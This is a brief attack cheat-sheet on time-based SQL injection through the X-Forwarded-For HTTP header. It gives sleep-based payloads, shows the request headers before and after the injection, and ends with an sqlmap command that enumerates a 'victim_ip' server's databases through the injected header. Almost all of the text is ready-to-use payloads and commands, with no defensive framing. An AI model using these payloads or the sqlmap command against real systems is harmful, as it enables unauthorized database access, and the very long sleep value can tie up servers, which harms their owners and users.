================= Time Based SQLi =================

- x-forwarded-for: 1' and sleep(1)='

::: Header Before Injection ::: Host: 10.0.0.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive

::: Header After Injection :::

Host: 10.0.0.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate x-forwarded-for: 1' and sleep(1000000)=' <<< Injection >>> Connection: keep-alive

======================= Automating with Sqlmap ======================= - sqlmap -u "http://victim_ip/vulnmodule.php?id=2-" --headers="X-Forwarded-For: *" --dbs